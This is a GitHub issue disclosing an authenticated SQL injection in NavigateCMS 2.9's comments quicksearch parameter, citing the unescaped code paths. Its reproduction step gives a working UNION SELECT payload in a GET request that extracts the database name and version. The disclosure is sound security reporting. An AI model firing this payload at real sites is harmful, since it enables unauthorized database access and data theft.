Skip to content

SQL injection UNION attack with quicksearch parameter in NavigateCMS 2.9 #25

Closed
@hydrasky-team

Description

@hydrasky-team

EXPECTED BEHAVIOUR
An authenticated malicious user can take advantage of a SQL injection UNION attack vulnerability with quicksearch parameter in URL.

IMPACT
A successful SQL injection attack may result in the unauthorized viewing of user lists, the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, all of which are highly detrimental to a business.

VULNERABILITY CODE
I found quicksearch parameter is not handled in SQL query with WHERE clause in \lib\packages\comments\comments.php

image

And the protect function in \lib\core\core.php is not use ESCAPE to filter special characters

image

Then it is use to query in: \lib\core\database.class.php

image

STEPS TO REPRODUCE

  1. We change the request in URL

GET /navigate/navigate/navigate.php?fid=comments&act=json&_search=true&quicksearch=%25")+UNION+ALL+SELECT+DATABASE(),null,null,null,null,null,null,VERSION()%3b--&_search=false&nd=1623493056682&rows=30&page=1&sidx=date_created&sord=desc&filters=

  1. And then we could exploit all the data.

image

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions